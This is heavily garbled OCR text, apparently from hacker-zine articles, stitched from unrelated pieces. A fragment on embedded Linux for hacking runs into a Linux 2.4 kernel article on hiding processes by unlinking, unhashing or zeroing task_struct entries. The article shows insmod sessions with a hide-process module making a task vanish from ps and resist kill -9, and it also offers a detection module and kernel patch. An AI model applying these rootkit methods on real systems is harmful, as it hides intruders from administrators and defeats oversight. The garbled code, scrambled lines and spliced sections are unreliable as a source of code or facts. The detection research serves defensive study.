According to The OPC Foundation, OPC technology can eliminate 
expensive custom interfaces and drivers tranditionally required 
for moving information easily around the enterprise. It promotes 
interoperability, including amongst different computing solutions 
and platforms both horizontally and vertically in the emterprise [25]. 
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--[ 7. -— What Else Of Magic That Embedded Linux Can Do ? 


So, we know the weakness of embedded system now, and we also know 
how to utilize the advantages of embedded system for hacking purpose. 
Then, what else of magic that we can do with embedded system? This is a 


good question. 


By referring to the development of network applications, ubiquitous 
and pervasive computing would be the latest issues. Embedded system would 


probably to be the future framework as embedded firewall, ubiquitous 


gateway/router, embedded IDS, mobile device security server, and so on. 


While existing systems are looking for network-enabled, embedded system 
had established its unique position for such purpose. A good example is 
migrating MySQL into embedded linux to provide online database-on-chip 


service (in FPGA) for a building access system with RFID tags. Again, 

the usage and development of embedded system has no limitation, the only 

limitation is the imagination. 

Tips: 

**T£f an embedded system works as a server (http, ftp, ...), it is going 
to provide services such as web control, web monitoring,... 

**Tf an embedded system works as a client (http, ftp, telnet, -), then 


it is more likely to be a programmable "hacking machine" 


-—-[ 8. - Conclusion 


expect every processing unit in the world as a personal computer. 
we need 
to consider all the cases properly, where we should use it and where we 
shouldn’t use it. Embedded security might be too new to discuss seriously 


we are begining to exploit the usefullness of embedded system, 


of 


Embedded system is an extremely useful technology, because we can’t 
While 


mbedded 


now but it always exist, and sometime naive. Besides, the abus 
system would cause more mysterious cases in the hacking world. 
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--[ 1 - looking back 


We begin our journey in the old days, when simply giving your 
process a weird name was enough to hide inside the tree. Sadly this is 


also quit ffective these days due to lack of skill from stock admins. 
In the last millenium ..well actualy just before 1999, backdooring 
binaries was very popular (ps, top, pstree and others [1]) but this was 


very easy to spot, ‘ls -l* easy / although some could only be cought by 
a combination of size and some checksum / (i speak having in mind the 
skilled admin, because, in my view, an admin that isnt a bit hackerish 
is just the guy mopping up the keyboard). And it was a pain in the ass 
compatibility wise. 


LRK (linux root kit) [2] is a good example of a "binary" kit. 
Not that long ago hackers started to turn towards the kernel to do their 
evil or to secure it. So,like everywhere this was an incremental process, 
starting from the upper level and going more inside kernel structures. 
The obvious place to look first were system calls, the entry point from 
userland to wonderland, and so the hooking method developed, be it by 
altering the sys_call_table[] (theres an article out there LKM_HACKING 
by pragmatic from THC about this [3]), or placing a jump inside the 
function body to your own code (developed by Silvio Cesare [4]) or even 
catching them at interrupt level (read about this in [5]).. and with this, 
one could intercept certain interesting system calls. 


But syscalls are by no means the last (first) point where the pid 
structures get assembled. getdents() and alike are just calling on some 
other function, and they are doing this by means of yet another layer, 
going through the so called VFS. Hacking this VFS (Virtual FileSystem 
layer) is the new trend on todays kits; and since all unices are basicaly 
comprised of the same logical layers, this is (was) very portable. So as 
you see we are building from higher levels, programming wise, to lower 
levels; from simply backdoring the source of our troubles to going closer 


to the root, to the syscalls (and the functions that are 
"syscall-helpers"). The VFS is not by all means as low as we can go 
(hehe we hackers enjoy rolling in the mud of the kernel). We yet have to 


explore the last frontier (well relatively speaking any new frontier is 
the last). Yup, the very structures that help create the pid list - 

the task_structs. And this is where our journey 

begins. 
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Some notes... kernel studied is from 2.4 branch (2.4.18 for source 
excerpts and 2.4.30 for patches and example code), theres some x86 
specific code (sorry, i dont have access to other archs), also SMP is 
not discussed for the same reason and anyway it should be clear in the 
end what will be different from UP machines. 


/* 

it seems the method i explain here is begining to emerge in part 
into the open underground in zero rk made by stealth from team teso, theres 
an article about it in phrack 61 [6], i was just about to miss the small 
REMOVE_LINKS looking so innocent there :-) 
a 


[ 2 the schedule(r) inside 


As processes give birth to other processes (just like in real life) 
they call on execve() or fork() syscalls to either get replaced or get 
splited into two different processes, a few things happen. We will look 
into fork as this is more interesting from our point of view. 


S$ grep -rn sys_fork src/linux/ 


For i386 compatible archs which is what I have, you will see that 
without any introduction this function calls do_fork() which is where the 
arch independent work gets done. It is in kernel/fork.c. 


<codesnip src="arch/i386/kernel/process.c" line=747> 
asmlinkage int sys_fork(struct pt_regs regs) 
{ 

return do_fork(SIGCHLD, regs.esp, &regs, 0); 
} 


</codesnip srce="arch/i386/kernel/process.c"> 


Besides great things which are not within the scope of this here, 
do_fork() allocates memory for a new task_struct 


<codesnip src="kernel/fork.c" line=587> 
int do_fork (unsigned long clone_flags, unsigned long stack_start, 
struct pt_regs *regs, unsigned long stack_size) 


{ 


p = alloc_task_struct (); 
</codesnip src="kernel/fork.c"> 


and does some stuff on it like initializing the run_list, 


<codesnip src="kernel/fork.c" line=653> 
INIT_LIST_HEAD (&p->run_list); 
</codesnip src="kernel/fork.c"> 


which is basicaly a pointer (you should read about the linux linked list 
implementation to grasp this clearly [7]) that will be used in a linked 
list of all the processes waiting for the cpu and those expired (that got 
the cpu taken away, not released it willingly by means of schedule()), 
used inside the schedule() function. 


The current priority array of what task queue we are in 
<codesnip src="kernel/fork.c" line=687> 

p->array = NULL; 
</codesnip src="kernel/fork.c"> 


(well we arent in any yet); the prio array and the runqueues are used 
inside the schedule() function to organize the tasks running and needing to 
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be run. 


<codesnip src="kernel/sched.c" line=124> 
typedef struct runqueue runqueue_t; 


struct prio_array { 
int nr_active; 
spinlock_t *lock; 
runqueue_t *rq; 
unsigned long bitmap [BITMAP_ST1ZI 
list_t queue [MAX_PRIO]; 


Gl 
i 
x 


This is the main, per-CPU runqueue data structure. 


Locking rule: those places that want to lock multiple runqueues 
(such as the load balancing or the process migration code), lock 
acquire operations must be ordered by ascending &runqueue. 


+ + + F F 


* 


7 

struct runqueue { 
spinlock_t lock; 
unsigned long nr_running, nr_switches, expired_timestamp; 
task_t *curr, *idle; 
prio_array_t *active, *expired, arrays[2]; 
int prev_nr_running[NR_CPUS]; 

} cacheline_aligned; 


static struct runqueue runqueues[NR_CPUS] __cacheline_aligned; 
</codesnip src="kernel/sched.c"> 


We‘1ll be discussing more about this later. 


The cpu time that this child will get; half the parent has goes to 
the child (the cpu time is the amout of time the task will get the 
processor for itself). 


<codesnip src="kernel/fork.c" line=727> 


p->time_slice = (current-—>time_slice + 1) >> 1; 
current-—>time_slice >>= 1; 
if (!current->time_slice) { 

/* 


* This case is rare, it happens when the parent has only 
* a single jiffy left from its timeslice. Taking the 
* runqueue lock is not a problem. 
ah, 
current-—>time_slice = 1; 
scheduler_tick(0,0); 


} 


</codesnip src="kernel/fork.c"> 


(for the neophytes, ">> 1" is the same as "/ 2") 


Next we get the tasklist lock for write to place the new process in 
the linked list and pidhash list 


<codesnip src="kernel/fork.c" line=752> 
write_lock_irg(&tasklist_lock) ; 


SET_LINKS (p); 
hash_pid(p); 
nr_threads++; 
write_unlock_irq(&tasklist_lock) ; 

</codesnip src="kernel/fork.c"> 


and release the lock. include/linux/sched.h has these macro and inline 
functions, and the struct task_struct also: 
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<codesnip src="include/linux/sched.h" line=292> 
struct task_struct { 

task_t *next_task, *prev_task; 

task_t *pidhash_next; 

task_t **pidhash_pprev; 
</codesnip src="include/linux/sched.h"> 


<codesnip src="include/linux/sched.h" line=532> 
define PIDHASH_SZ (4096 >> 2) 
extern task_t *pidhash[PIDHASH_SZ]; 


define pid_hashfn (x) ((( (x) >> 8) * (x)) & (PIDHASH_SZ - 1)) 


static inline void hash_pid(task_t *p) 


task_t **htable = é&pidhash[pid_hashfn(p->pid) ]; 


if ((p->pidhash_next = *htable) != NULL) 
(*htable)->pidhash_pprev = &p->pidhash_next; 
*htable = p; 
p->pidhash_pprev = htable; 
} 


</codesnip src="include/linux/sched.h"> 


<codesnip src="include/linux/sched.h" line=863> 
#define SET_LINKS(p) do { \ 

(p) ->next_task &init_task; \ 
p)->prev_task = init_task.prev_task; \ 


( 

init_task.prev_task->next_task = (p); \ 
init_task.prev_task = (p); \ 

(p)->p_ysptr = NULL; \ 

if (((p)->p_osptr = (p)—->p_pptr->p_cptr) != NULL) \ 


(p)->p_osptr->p_ysptr = p; \ 
(6) ->p-pptr--pucptr. =p; -\ 
} while (0) 
</codesnip src="include/linux/sched.h"> 


So, pidhash is an array of pointers to task_structs which hash to 
the same pid, and are linked by means of pidhash_next/pidhash_pprev; this 
list is used by syscalls which get a pid as parameter, like kill() or 
ptrace(). The linked list is used by the /proc VFS and not only. 


Last, the magic: 


<codesnip src="kernel/fork.c" line=776> 


define RUN_CHILD_FIRST 1 
if RUN_CHILD_FIRST 

wake_up_forked_process (p); /* do this last */ 
else 

wake_up_process (p); /* do this last */ 
endif 


</codesnip src="kernel/fork.c"> 


this is a function in kernel/sched.c which places the task_t (task_t is a 
typedef to a struct task_struct) in the cpu runqueue. 


<codesnip src="kernel/sched.c" line=347> 
void wake_up_forked_process(task_t * p) 


{ 


p->state = TASK_RUNNING; 
activate_task(p, rq); 
</codesnip src="kernel/sched.c"> 


So lets walk through a process that after it gets the cpu calls just 
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sys_nanosleep (sleep() is just a frontend) and jumps in a never ending loop, 
ill try to make this short. After setting the task state to 
TASK_INTERRUPTIBLE (makes sure we get off the cpu queue when schedule() is 
called), sys_nanosleep() calls upon another function, schedule_timeout () 
which sets us on a timer queue by means of add_timer() which makes sure we 
get woken up (that we get back on the cpu queue) after the delay has 

passed and effectively relinquishes the cpu by calling shedule() (most 
blocking syscalls implement this by putting the process to sleep until the 


perspective resource is available). 


<codesnip src="kernel/timer.c" line=877> 
asmlinkage long sys_nanosleep(struct timespec *rqtp, struct timespec *rmtp) 


{ 


current-—>state = TASK_INTERRUPTIBLE; 
xpire = schedule_timeout (expire) ; 
</codesnip src="kernel/timer.c"> 


<codesnip src="kernel/timer.c" line=819> 
signed long schedule_timeout (signed long timeout) 


{ 


struct timer_list timer; 


init_timer (&timer); 


timer.expires = expire; 
timer.data = (unsigned long) current; 
timer.function = process_timeout; 


add_timer (&timer) ; 
schedule (); 
</codesnip src="kernel/timer.c"> 


If you want to read more about timers look into [7]. 


Next, schedule() takes us off the runqueue since we already arranged 
to be set on again there later by means of timers. 


<codesnip src="kernel/sched.c" line=744> 
asmlinkage void schedule (void) 


{ 


deactivate_task (prev, rq); 
</codesnip src="kernel/sched.c"> 


(remember that wake_up_forked_process() called activate_task() to place us 
on the active run queue). In case there are no tasks in the active queue 
it tryes to get some from the expired array as it needs to set up for 
another task to run. 


<codesnip src="kernel/sched.c" line=784> 


if (unlikely(!array->nr_active)) { 
/* 
* Switch the active and expired arrays. 
*/ 


</codesnip src="kernel/sched.c"> 


Then finds the first process there and prepares for the switch (if it 
doesnt find any it just leaves the current task running). 


<codesnip src="kernel/sched.c" line=805> 
context_switch(prev, next); 
</codesnip src="kernel/sched.c"> 


This is an inline function that prepares for the switch which will get done 
in __switch_to() (switch_to() is just another inline function, sort of) 


<codesnip src="kernel/sched.c" line=400> 
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static inline void context_switch(task_t *prev, task_t *next) 
</codesnip src="kernel/sched.c"> 


<codesnip src="include/asm-i386/system.h" line=15> 
define prepare_to_switch () do { } while(0) 
define switch_to(prev,next,last) do { 

asm volatile("pushl %%esi\n\t" 


"pushl %%ebp\n\t" 
movl %%esp,%0\n\t" /* save ESP */ 
"movl %3,%%esp\n\t" /* restore ESP */ 
"movl $1f£,%1\n\t" /* save EIP */ 
"oushl %4\n\t" /* restore EIP */ 
"Imp __switch_to\n" 
Wale \ cat 
"popl %%e 
"vnopl %%edi\n\t" 
"popl %%esi\n\t" 

( 

( 

n 


:"=m" (prev->thread.esp),"=m" (prev->thread.eip), 
Wop" L 
Wnt ( 
wa (prev) , 
"pb" (prev) ); 


) 
xt->thread.esp),"m" (next->thread.eip), 
Wal “(next jz, 


OE OO, BPO EE IE BE aE OE OO DE, AO IE 


} while (0) 
</codesnip src="include/asm-i386/system.h"> 


Notice the "jmp __switch_to" inside all that assembly code that 
simply arranges the arguments on the stack. 


<codesnip src="arch/i386/kernel/process.c" line=682> 
void __switch_to(struct task_struct *prev_p, struct task_struct *next_p) 
{ 


</codesnip src="arch/i386/kernel/process.c"> 


context_switch() and switch_to() causes what is known as a context switch 
(hence the name) which in not so many words is giving the processor and 
memory control to another task. 


But enough of this; now what happends when we jump in the never 
ending loop. Well, its not actually a never ending loop, if it would be 
your computer would just hang. What actually happends is that your task 
gets the cpu taken away from it every once in a while and gets it back 
after some other tasks get time to run (theres queueing mechanisms that 
let tasks share the cpu based on theire priority, if our task would have 


a real time priority it would have to release the cpu manualy by 
sched_yeld()). So how exactly is this done; lets talk a bit about the 
timer interrupt first coz its closely related. 


This is a function like most things are in the linux kernel, and its 
described in a struct 


<codesnip src="arch/i386/kernel/time.c" line=556> 

static struct irgaction irgO = { timer_interrupt, SA_INTERRUPT, 0, 
"timer", NULL, NULL}; 

</codesnip src="arch/i386/kernel/time.c"> 


and setup in time_init. 


<codesnip src="arch/i386/kernel/time.c" line=635> 
void __init time_init (void) 


setup_irg(CO_IRQ_TIMER, &irq0O); 


else 
setup_irgq(0, &irgq0); 


endif 
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</codesnip src="arch/i386/kernel/time.c"> 


After this, every timer click, timer_interrupt() is called and at some 
point calls do_timer_interrupt () 


<codesnip src="arch/i386/kernel/time.c" line=466> 
static void timer_interrupt (int irq, void *dev_id, struct pt_regs *regs) 


{ 


do_timer_interrupt (irg, NULL, regs); 
</codesnip src="arch/i386/kernel/time.c"> 


which calls on do_timer (bare with me). 
<codesnip src="arch/i386/kernel/time.c" line=393> 


static inline void do_timer_interrupt (int irg, void *dev_id, 
struct pt_regs *regs) 


do_timer (regs); 
</codesnip srce="arch/i386/kernel/time.c"> 


do_timer() does two things, first update the current process times and 


second call on schedule_tick() which precurses schedule() by first taking 
the current process of the active array and placing it in the expired 
array; this is the place where bad processes (the dirty hogs :-) get 


their cpu taken away from them. 


<codesnip src="kernel/timer.c" line=665> 
void do_timer(struct pt_regs *regs) 


{ 


(*(unsigned long *)&jJiffies)++; 
#ifndef CONFIG_SMP 
/* SMP process accounting uses the local APIC timer */ 


update_process_times (user_mode (regs) ); 
#fendif 
</codesnip src="kernel/timer.c"> 


<codesnip src="kernel/timer.c" line=578> 


/* 
* Called from the timer interrupt handler to charge one tick to the 

* current process. user_tick is 1 if the tick is user time, 0 for system. 
af 


void update_process_times(int user_tick) 


{ 


update_one_process(p, user_tick, system, cpu); 
scheduler_tick(user_tick, system); 
} 


</codesnip src="kernel/timer.c"> 


<codesnip src="kernel/sched.c" line=663> 

/* 

* This function gets called by the timer code, with HZ frequency. 
* We call it with interrupts disabled. 
a 


void scheduler_tick(int user_tick, int system) 


/* Task might hav xpired already, but not scheduled off yet */ 


if (p->array != rq->active) { 
p->need_resched = 1; 
return; 

} 

if (!--p->time_slice) { 


dequeue_task(p, rq->active); 
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if (!TASK_INTERACTIVE(p) || EXPIRED_STARVING(rq)) { 


enqueue_task(p, rq->expired); 


} else 
enqueue_task(p, rq->active); 
} 


</codesnip srce="kernel/sched.c"> 


Notice the "need_resched" field of the task struct getting set; now the 
ksoftirgd() task which is a kernel thread will catch this process and call 
schedule () 


[root@absinth root]# ps aux | grep ksoftirqd 
root 3. COs. Oh 30240 0 0 ? SWN 11:45 0:00 [ksoftirqd_CPUO] 


<codesnip src="kernel/softirg.c" line=398> 
__init int spawn_ksoftirqd (void) 


{ 


= 0; cpu < smp_num_cpus; cputt+) { 
if (kernel_thread(ksoftirgd, (void *) (long) cpu, 
CLONE_FS | CLONE_FILES | CLONE SIGNAL) < 0) 
printk("spawn_ksoftirgqd() failed for cpu %d\n", cpu); 


__initcall (spawn_ksoftirgqd) ; 
</codesnip src="kernel/softirg.c"> 


<codesnip src="kernel/softirg.c" line=361> 
static int ksoftirqd(void * __bind_cpu) 
{ 


if (current-—>need_resched) 
schedule (); 


</codesnip src="kernel/softirg.c"> 


And if all this seems bogling to you dont worry, just walk through 
the kernel sources again from the begining and try to understand more than 
im explaining here, no one expects you to understand from the first read 
through such a complicated process like the linux scheduling.. remeber that 
the cookie lies in the details ;-) you can read more about the linux 
scheduler in [7], [8] and [9] 


Every cpu has its own runqueue, so apply the same logic for SMP; 


So you can see how a process can be on any number of lists waiting 
for execution, and if its not on the linked task_struct list we‘re in big 
trouble trying to find it. The linked and pidhash lists are NOT used by 
the schedule() code to run your program as you saw, some syscalls do use 
these (ptrace, alarm, the timers in general which use signals and all 
calls that use a pid - for the pidhash list) 


Another note to the reader..all example progs from the _attacking_ 
section will be anemic modules, no dev/kmem for you since i dont want my 
work to wind up in some lame rk that would only contribute to wrecking the 
net, although kmem counterparts have been developed and tested to work 
fine, and also, with modules we are more portable, and our goal is to 
present working examples that teach and dont krash your kernel; the 
countering section will not have a kmem enabled prog simply because I’m 
lazy and not in the mood to mess with elf relocations (yup to loop the 
list in a reliable way we have to go in kernel with the code).. 

I’1l be providing a kernel patch though for those not doing modules. 
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You should know that if any modules give errors like 

"hp.o: init_module: Device or resource busy 

Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 


You may find more information in syslog or the output from dmesg" 
when inserting, this is a "feature" (heh) so that you wont have to rmmod 
it, the modules do the job theyre supposed to. 


--[ 3 - abusing the silence ( attacking ) 


If you dont have the IQ of a windoz admin, it should be pretty clear 
to you by now where we are going with this. Oh im sorry i meant to say 
"Windows (TM) admin (TM)" but the insult still goes. Since the linked list 
and pidhash have no use to the scheduler, a program, a task in general 
(kernel threads also) can run happy w/o them. So we remove it from there 
with REMOVE_LINKS/unhash_pid and if youve been a happy hacker looking at 
all of the sources ive listed you know by now what these 2 functions do. 
All that will suffer from this operation is the IPC methods (Inter Process 
Comunications); heh well were invisible why the fuck would we answer if 
someone asks "is someone there ?" :) however since only the linked list is 
used to output in ps and alike we could leave pidhash untouched so that 
kill/ptrace/timers.. will work as usualy. but i dont see why would anyone 
want this as a simple bruteforce of the pid space with kill(pid,0) can 
uncover you.. See pisu program that i made that does just that but using 76 
syscalls besides kill that "leak" pid info from the two list structures. So 
you get the picture, right ? 


hp.c is a simple module to hide a task: 


[root@absinth ksched]# gcc -c -I/SLINUXSRC/include src/hp.c -o src/hp.o 


[Method 1] 


Now to show you what happends when we unlink the process from certain 
lists; first from the linked list 


[root@absinth ksched]# ps aux | grep sleep 


root 1129 0.0 0.5 1848 672 pts/4 S 22:00 0:00 sleep 666 
root 1131 0.0 0.4 1700 600 pts/2 R 22:00 0:00 grep sleep 
[root@absinth ksched]# insmod hp.o pid=‘*pidof sleep* method=1 

hp.o: init_module: Device or resource busy 


Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 
You may find more information in syslog or the output from dmesg 


root@absinth ksched]# tail -2 /var/log/messages 

Mar 13 22:02:50 absinth kernel: [HP] address of task struct for pid 

1129 is Oxc0f44000 

Mar 13 22:02:50 absinth kernel: [HP] removing process links 
root@absinth ksched]# ps aux | grep sleep 

root 1140 0.0 0.4 1700 608 pts/2 S 22:03 0:00 grep sleep 
root@absinth ksched]# insmod hp.o task=0xc0Of44000 method=1 

hp.o: init_module: Device or resource busy 


Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 
You may find more information in syslog or the output from dmesg 


root@absinth ksched tail -1 /var/log/messages 
Mar 13 22:03:53 absinth kernel: [HP] unhideing task at addr Oxc0f44000 
Mar 13 22:03:53 absinth kernel: [HP] setting process links 
root@absinth ksched ps aux | grep sleep 
root 1129 0.0 0.5 1848 672 pts/4 S 22:00 0:00 sleep 666 
root 1143 0.0 0.4 1700 608 pts/2 S 22:04 0:00 grep sleep 
root@absinth ksched 


[Method 2] (actualy an added enhacement to method 1) 
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Point made. Now from the hash list 


[root@absinth ksched]# insmod hp.o pid=‘pidof sleep* method=2 
hp.o: init_module: Device or resource busy 

Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 

You may find more information in syslog or the output from dmesg 


[root@absinth ksched]# tail -2 /var/log/messages 


Mar 13 22:07:04 absinth kernel: [HP] address of task struct for pid 1129 
is Oxc0f44000 

Mar 13 22:07:04 absinth kernel: [HP] unhashing pid 

[root@absinth ksched]# insmod hp.o task=0xc0f44000 method=2 

hp.o: init_module: Device or resource busy 


Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 


You may find more information in syslog or the output from dmesg 
[root@absinth ksched]# tail -1 /var/log/messages 
Mar 13 22:07:18 absinth kernel: [HP] unhideing task at addr Oxc0f44000 
Mar 13 22:07:18 absinth kernel: [HP] hashing pid 
[root@absinth ksched]# kill -9 1129 
[root@absinth ksched] 


So upon removing from the hash list the process also becomes invulnerable 
to kill signals and any other syscalls that use the hash list for that 
matter. This also hides your task from methods of uncovering like 
kill(pid,0) which chkrootkit [10] uses. 


* methods 1 and 2 arent that good at hideing shells since most have builtin 
job control and that requires a working find_task_by_pid() and 
for_each_task() (look at sys_setpgid() sources), however, if you know how 
to disable that it works just fine :P ok ill give you a hint, make the 
standard output/input not a terminal. 


[Method 3] 


But this is kids stuff; lets abuse the way the function that generates the 
pid list for the /proc VFS works. 


<codesnip src="fs/proc/base.c" line=1057> 
static int get_pid_list (int index, unsigned int *pids) 
{ 


for_each_task(p) { 
if ('!pid) 
continue; 
</codesnip src="fs/proc/base.c"> 


Have you spoted the not ? :-) cmon its easy, just make our pid 0 and we 
wont get listed (pid 0 tasks are of a special kernel breed and thats why 
they dont get listed there - actualy the kernel itself, the first "task" 
and its cloned children like the swapper); also since we are changing the 
pid but not rehashing the pid position in the hash list all searches for 
pid 0 will go to the wrong hash and all searches for our old pid will 
find a task with a pid of 0, well it will fail each time. An interesting 
side effect of having pid 0 is that the task can call clone() [11] with a 
flag of CLONE_PID, effectively spawning hidden children as well; 

aint that a threat? The old pid can be recovered from tgid member of the 
task_struct since getpid() does it so can we, and moreover this method 

is so safe to do from user space since we arent complicating with 
possible race conditions screwing with the task list pointers. Well safe 
as long as your process doesnt exit as we are just changing its pid.. 


<codesnip src="kernel/timer.c" line=710> 
asmlinkage long sys_getpid(void) 
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/* This is SMP safe - current->pid doesn’t change */ 
return current-—>tgid; 


} 


</codesnip src="kernel/timer.c"> 


btw if we change only the pid to 0 there will be no danger that another 
process migth be assigned the same pid we _had_ because in the get_pid() 
func theres a check for tgid also, which we leave untouched and use to 
restore the pid (just read the source for hp.c) 


[root@absinth ksched]# ps aux | grep sleep 

root 1991 0.2 0.5 1848 672 pts/7 S 193.13 0:00 sleep 666 
root 1993 0.0 0.4 1700 608 pts/6 S 19:13 0:00 grep sleep 
[root@absinth ksched]# insmod hp.o pid=‘*pidof sleep* method=4 

hp.o: init_module: Device or resource busy 


Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 

You may find more information in syslog or the output from dmesg 
[root@absinth ksched]# tail -2 /var/log/messages 


Mar 16 19:14:07 absinth kernel: [HP] address of task struct for pid 1991 
is Oxc30£0000 

Mar 16 19:14:07 absinth kernel: [HP] zerofing pid 

[root@absinth ksched]# ps aux | grep sleep 

root 1999 0.0 0.4 1700 600 pts/6 R 19:14 0:00 grep sleep 
[root@absinth ksched]# kill -9 1991 

bash: kill: (1991) - No such process 

[root@absinth ksched]# insmod hp.o task=0xc30f0000 method=4 

hp.o: init_module: Device or resource busy 


Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 
You may find more information in syslog or the output from dmesg 


[root@absinth ksched]# tail -1 /var/log/messages 

Mar 16 19:14:47 absinth kernel: [HP] unhideing task at addr Oxc0f44000 
Mar 16 19:14:47 absinth kernel: [HP] reverting zero pid to 1991 
[root@absinth ksched]# ps aux | grep sleep 

root 1991 0.0 0.5 1848 672 pts/7 S LOS T3 0:00 sleep 666 
[root@absinth ksched] 


See how cool is this? I might say that all this article is about is 
zerofing pids in task_structs :-) 
(and you only have to change 2 bytes at most to hide a process !) 


* your task should never call exit when having pid 0 or it will suck from 
do_exit which is called by sys_exit 


<codesnip src="kernel/exit.c" line=480> 
NORET_TYPE void do_exit (long code) 
{ 


if (!tsk->pid) 
panic("Attempted to kill the idle task!"); 
<codesnip src="kernel/exit.c"> 


That is if you hide your shell like this be sure to unhide it (set its pid 


to something) before you ‘exit*.. or , dont mind me and exit the whole 
system hehe. In a compromised environment do_exit could have that 
particular part overwritten with nops (no operation instruction - an 


asm op code that does nothing). 


You can use for the method field when insmoding hp.o any combination of the 
3 bit flags presented 


--[ 4 - can you scream ? ( countering) 


Should you scream? Well, yes. Detecting the first method can be a 
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waiting game or at best, a hide and seek pain-in-the-ass inside all the 
waiting queues around the kernel, while holding the big lock. But no, its 
not imposible to find a hidden process even if it could mean running a rt 
task that will take over the cpu(s) and binary search the kmem devic 

This could be done as a brute force for certain magic numbers inside the 
task struct whithin the memory range one could get allocated and look if 
its valid with something like testing its virtual memory structures but 
this has the potential to be very unreliable (and ..hard). 


Finding tasks that are hiden this way is a pain as no other structure 
contains a single tasks list so that in a smooth soop we could itterate and 
see what is not inside the linked list and pidhash and if there would be we 
wouldve probably removed out task from there too hehe. If you think by now 
this will be the ultimate kiddie-method, hope no more, were smart people, 
for every problem we release the cure also. So there is a ..way :) .. a 
clever way exploiting what every process desires, the need to run ;-} *evil 
grin* 


This method can take a while however, if a process blocks on some call like 
listen() since we only catch them when they _run_ while being _hidden_ 


Other checks could verify the integrity of the linked list, like the 
order in the list and the time stamps or something (know that ptrace() [12] 
fucks with this order). 


To backdoor switch_to (more exactly __switch_to, remember the first 
is a define) is a bit tricky from a module, however ive done it but it 
doesnt seem very portable so instead, from a module, we hook the syscall 
gate thus exploiting the *need to call* of programs :-), which is very 
easy, and every program in order to run usefuly has to call some syscalls, 
right? 


But so that you know, to trap into schedule() from a module (or from kmem 
for that matter) we find the address of __switch_to(). We could do this 
two ways, either do some pattern matching for calls inside schedule() or 
notice that sys_fork() is right after __switch_to() and do some math. 
After that just insert a hook at the end of __switch_to (doing it before 
__switch_to would make our code execute in unsafe environment - krash — 
since its a partialy switched environment). 


So this is what the module does, the kernel patch, sh.patch uses the 
mentioned need to run of processes by inserting a call inside the 
schedule() function which was described earlier and checks the structs 
against the current process. 


So how do we deal with _real_ pid 0 tasks, that we dont catch them 
as being rogues? Remember what ive said about the pid 0 tasks being a 
special breed, they are kernel threads in effect so we can differentiate 
them from normal user land processes because they have no allocated memory 
struct / no userland memory dooh! / and no connected binary format struct 
for that matter (a special case would be when one would have its evil task 
as a mangled kernel thread but i guess we could tell even then by name or 
the number of active kernel threads if its an evil one). 


Anyway for an example with the *need ro call* method.. For this we launch a 
bash session so that we can _put it on the run queue_ by writing some 
command on it.. like i said, we catch these tasks only when they do 
syscalls 


[root@absinth ksched]# gcc -c -I/SLINUXSRC/include src/sht.c -o src/sht.o 
[root@absinth ksched]# insmod sht.o 
[root@absinth ksched]# insmod hp.o pid=‘*pidof hidden_bash* method=1 
hp.o: init_module: Device or resource busy 
Hint: insmod errors can be caused by incorrect module parameters, 
including invalid IO or IRQ parameters 

You may find more information in syslog or the output from dmesg 
( now we type some command in the hidden bash session to make it run ) 
[root@absinth root]# tail /var/log/messages 
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Jul 8 19:43:26 absinth kernel: [SHT] task pid 562 <bash> task addr 
Oxc72£0000 syscall 175 - TASK IS HIDDEN ( NOT ON LINKED LIST / on pidhash 
list / pid is valid ) 
Jul 8 19:43:26 absinth kernel: [SHT] task pid 562 <bash> task addr 
Oxc72£0000 syscall 3 - TASK IS HIDDEN ( NOT ON LINKED LIST / on pidhash 
list / pid is valid ) 

root@absinth ksched]# rmmod sht 


Voila. It works... it also looks for unhashed or pid 0 tasks; the only 
problem atm is the big output which ill sort out with some list hashed by 
the task address/pid/processor/start_time so that we only get 1 warning 
per hidden process :-/ 


To use the kernel patch instead of the module change to the top of your 
linux source tree and apply it with ‘patch -p0O < sh.patch* (if you have a 
layout like /usr/src/linux/, cd into /usr/src/). The patch is for the 
2.4.30 branch (although it migth work with other 2.4 kernels; if you need 
it for other kernel versions check with me) and it works just like the 
module just that it hooks directly into the schedule() function and so can 
catch sooner any hidden tasks. 


Now if some of you are thinking at this point why make public 
research like this when its most likely to get abused, my answer is 
simple, dont be an ignorant, if i have found most of this things on my own 
I dont have any reason to believe others havent and its most likely to 
already been used in the wild, maybe not that widespead but lacking the 
right tools to peek in the kernel memory, we would never know if and how 
used it is already. So shut your suck hole .. the only ppl hurting from 
this are the underground hackers, but then again they are brigth people 
and other more leet methods are ahead :-) just think about hideing a task 
inside another task (sshutup ubra !! lol no peeking) 

you will read about it probably in another small article 
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[9] KernelAnalysis-HOWTO #Linux Multitasking 
by Roberto Arcomano <berto@fatamorgana.com> 
http://www.tldp.org/HOWTO/KernelAnalysis-—HOWTO. html 


[10] chkrootkit - CHecK ROOT KIT 
by Nelson Murilo <nelson@pangeia.com.br> 
http://www.chkrootkit.org/ 


[11] manual page for clone (2) 
http://linux.com.hk/PenguinWeb/manpage. jsp?section=2éname=clon 


[12] manual page for ptrace (2) 
http://linux.com.hk/PenguinWeb/manpage. jsp?section=2éname=ptrac 


--[ 6 - and the game dont stop.. 


Hei fukers! octavian, trog, slider, raven and everyon lse I keep 
close with, thanks for being there and wasteing time with me, sometimes I 
really need that ; ruffus , nirolf and vadim wtf lets get the old team on 
again .. bafta pe oriunde sunteti dudes. 


If you notice any typos, mistakes, have anything to communicate with 
me feel fr make contact. 


web - w3.phi.group.eu.org 
mail - ubra_phi.group.eu.org 
irc Efnet/Undernet #PHI 


* the contact info and web site is and will not be valid/up for a few 
weeks while im moving house, sorry ill get things settled ASAP ( that 
is up until about august of 2005 ), meanwhile you can get in touch 
with me on the email dragosg_personal.ro 


--[ 7 - sources 


<++> src/Makefile 


all: -‘sht.c hp.c 
gcc -c -I/EDIT_HERE_YOUR_LINUX_SOURCE_TR 


5 


1E/linux/include sht.c hp.c 


<> 


<++> src/hp.c 


/* | 
x hp - hide pid v1.0.0 
x hides a pid using different methods 
x ( demo code for hideing processes paper ) 
* 
c syntax : insmod hp.o (pid=pid_no|task=task_addr) [method=0x1]|0x2|0x4] 
* 
5 coded in 2004 by ubra from PHI Group 
ie web - ubra.phi.group.za.org 
tas mail - ubra_phi.group.za.org 
